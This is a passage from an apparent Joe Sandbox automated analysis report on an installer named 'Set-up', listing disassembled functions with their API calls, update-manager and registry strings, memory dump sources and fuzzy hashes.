                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskErrorLast
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<char>::operator []
                                                                                                                                  • API String ID: 523316592-2453873884
                                                                                                                                  • Opcode ID: 8ebd591ccf5fa57fb48dc4119bb3b26aff3efaf489a5a7ee17170f4b60cfcfe2
                                                                                                                                  • Instruction ID: 032a152ab7eaf0fed50ede278f95280ca29dbe1c15268b6b9d3cc4c147dc3fd9
                                                                                                                                  • Opcode Fuzzy Hash: 8ebd591ccf5fa57fb48dc4119bb3b26aff3efaf489a5a7ee17170f4b60cfcfe2
                                                                                                                                  • Instruction Fuzzy Hash: C7A10430A912128FDF28CE15E580B7DB3A1EF90729F18697CC497A7ED1E774A981C702
                                                                                                                                  Function 00E7F8A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 239COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6CE60: RegCloseKey.ADVAPI32(012A03EC,460C02D8,?), ref: 00E6CEA1
                                                                                                                                  • new.LIBCMT ref: 00E7F9D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: !af_$BvUpdateManager::Load$datavect<unsigned char>::empty
                                                                                                                                  • API String ID: 3535843008-4123486968
                                                                                                                                  • Opcode ID: 2101e7e6b38c3f23541b610ce7034f31b04585afdc85166b169917394e123119
                                                                                                                                  • Instruction ID: 952251a6c9bffe8983b3c647a64347bb0d2f4a6b5471194eb60cab6503e5ace2
                                                                                                                                  • Opcode Fuzzy Hash: 2101e7e6b38c3f23541b610ce7034f31b04585afdc85166b169917394e123119
                                                                                                                                  • Instruction Fuzzy Hash: B9A19C70904248EFDB15CF94C954BEEBBF4EF54318F2481AEE4497B281D7B66A04CB91
                                                                                                                                  Function 00E6DD70 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 220COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6DEDC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: !af_$RegQueryValueExW()$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 2005118841-2130799390
                                                                                                                                  • Opcode ID: d44ec31546a4d938fd42e18ed7c42fd0809b280b1106c5e70d79233537f8ff51
                                                                                                                                  • Instruction ID: b6ba6b5e42118356f5ed5eb24b8f9313eee154cb1e2c6def8067bd05be6b8080
                                                                                                                                  • Opcode Fuzzy Hash: d44ec31546a4d938fd42e18ed7c42fd0809b280b1106c5e70d79233537f8ff51
                                                                                                                                  • Instruction Fuzzy Hash: D481D030F44209DFCB24DF98E894BEEBBB5AF54358F549168E4127B281DB729D04CB90
                                                                                                                                  Function 00E56A00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 202COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E56C13
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: parameter value; expecting 'y' or 'n'.$Invalid -$yes
                                                                                                                                  • API String ID: 2005118841-2405171723
                                                                                                                                  • Opcode ID: a28ff3c3015c9046f93ab49737ded535ad1e4bfd7448240f6c571cdfef9ca4e1
                                                                                                                                  • Instruction ID: 18ece9ffcba91d41edeb6ae268735deac69f2d08c4d3fa002a7f6369315b16b6
                                                                                                                                  • Opcode Fuzzy Hash: a28ff3c3015c9046f93ab49737ded535ad1e4bfd7448240f6c571cdfef9ca4e1
                                                                                                                                  • Instruction Fuzzy Hash: 37819B719002089FDF10DFA4D945BEEBBF8EF15319F548459E814B7382D776AA09CBA0
                                                                                                                                  Function 00E5EA00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E5EA4A
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: ERROR: $Trace: $Warning:
                                                                                                                                  • API String ID: 2281437974-3985709694
                                                                                                                                  • Opcode ID: ebf08de661d2fe53878989570ed25c8431d0de9c5428a1693e2967f4604f47f3
                                                                                                                                  • Instruction ID: dd7bd023e235afb91e7b0920e0f1266904622cb1fe0e4323106c2bf4e167ba6f
                                                                                                                                  • Opcode Fuzzy Hash: ebf08de661d2fe53878989570ed25c8431d0de9c5428a1693e2967f4604f47f3
                                                                                                                                  • Instruction Fuzzy Hash: 57614271E002099BCF18DF64D945AEEB7B8EF04755F105959F822B7391DB30AA09CBA1
                                                                                                                                  Function 00E42850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E429D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: basic_ncstring<char>::insert$extend <= str.size() + 1 - off$off <= str.size()
                                                                                                                                  • API String ID: 118556049-1041268945
                                                                                                                                  • Opcode ID: 5444208e39d6cd77584e18f6d529c2b7f7bef71952df6548eae494b482b2f8e9
                                                                                                                                  • Instruction ID: 5261841965c489d069beb72c6cf002ca1b739237a7dec75c00990abffa94e033
                                                                                                                                  • Opcode Fuzzy Hash: 5444208e39d6cd77584e18f6d529c2b7f7bef71952df6548eae494b482b2f8e9
                                                                                                                                  • Instruction Fuzzy Hash: A551D571B0020A9FCB18DF58ECC0A6EB7A9EF94318B54452DFA15E7245E732ED15C790
                                                                                                                                  Function 00E3C230 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E3C232
                                                                                                                                    • Part of subcall function 010FFBD0: GetCurrentProcess.KERNEL32(00000001,460C02D8,?,00000000,00000000,011A3DC3,000000FF,?,011129E7,00000001), ref: 010FFC14
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C33A
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentExceptionException@8ProcessRaiseThrow
                                                                                                                                  • String ID: %$Check for updates failed:
                                                                                                                                  • API String ID: 3100977213-1640003455
                                                                                                                                  • Opcode ID: defe22dced068673fa2751474b1f6e8e0f12dba8020e79b5c5a5bd25d218b10d
                                                                                                                                  • Instruction ID: 10ff5cdd771be44dcc786f7e95c1bff9490b48e19b8d36979b8637ce7d186a00
                                                                                                                                  • Opcode Fuzzy Hash: defe22dced068673fa2751474b1f6e8e0f12dba8020e79b5c5a5bd25d218b10d
                                                                                                                                  • Instruction Fuzzy Hash: 19716A70C05288DEEB15EBA4D959BDDBFF0AF25308F2480E8D04977292DB745B48DB62
                                                                                                                                  Function 00E758F0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E75923
                                                                                                                                  • new.LIBCMT ref: 00E75936
                                                                                                                                    • Part of subcall function 01119334: Concurrency::cancel_current_task.LIBCPMT ref: 0111934C
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  • result.IsType<UpdateCheckResult>(), xrefs: 00E75AA5
                                                                                                                                  • BvUpdateManager::RunCheckForUpdatesThread, xrefs: 00E75AA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task$BreakDebugDebuggerFileModuleNamePresent
                                                                                                                                  • String ID: BvUpdateManager::RunCheckForUpdatesThread$result.IsType<UpdateCheckResult>()
                                                                                                                                  • API String ID: 2958679970-353432569
                                                                                                                                  • Opcode ID: e980f333a6c631918ca7a3b338461e2dd193b1a5c65f1b620bd209f79aa28828
                                                                                                                                  • Instruction ID: 68c5ca2e2c2f6aca7281e5872ebf35455d662cf88311519d13de831d1fc941ab
                                                                                                                                  • Opcode Fuzzy Hash: e980f333a6c631918ca7a3b338461e2dd193b1a5c65f1b620bd209f79aa28828
                                                                                                                                  • Instruction Fuzzy Hash: 23518CB1904349EFEB10CF95C945B9EBBF8EF04718F10856DE458BB281D7BA6A04CB91
                                                                                                                                  Function 0106FFB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000002,0131A974,00000000,011E3870,00000000,?,00000000,?,00000000), ref: 0107001D
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,00000000), ref: 010700B6
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,RuntimeVersion,00000000,00000001,0131A974,00000000), ref: 01070117
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$Create
                                                                                                                                  • String ID: RuntimeVersion
                                                                                                                                  • API String ID: 3530024225-3397776816
                                                                                                                                  • Opcode ID: 9af961bb564a2d4071520837eae51340fcaa82fcb751237a7d4ea5538a594abd
                                                                                                                                  • Instruction ID: 678766a493fb5ae97e8dc003f634c0cb0e2aac8ee1d002a5bbeedb82ce34e091
                                                                                                                                  • Opcode Fuzzy Hash: 9af961bb564a2d4071520837eae51340fcaa82fcb751237a7d4ea5538a594abd
                                                                                                                                  • Instruction Fuzzy Hash: 93519DB0E04248EFDB28DFA8DD19BAEBBF4BB05704F104169F555AB2D0D770A904CB50
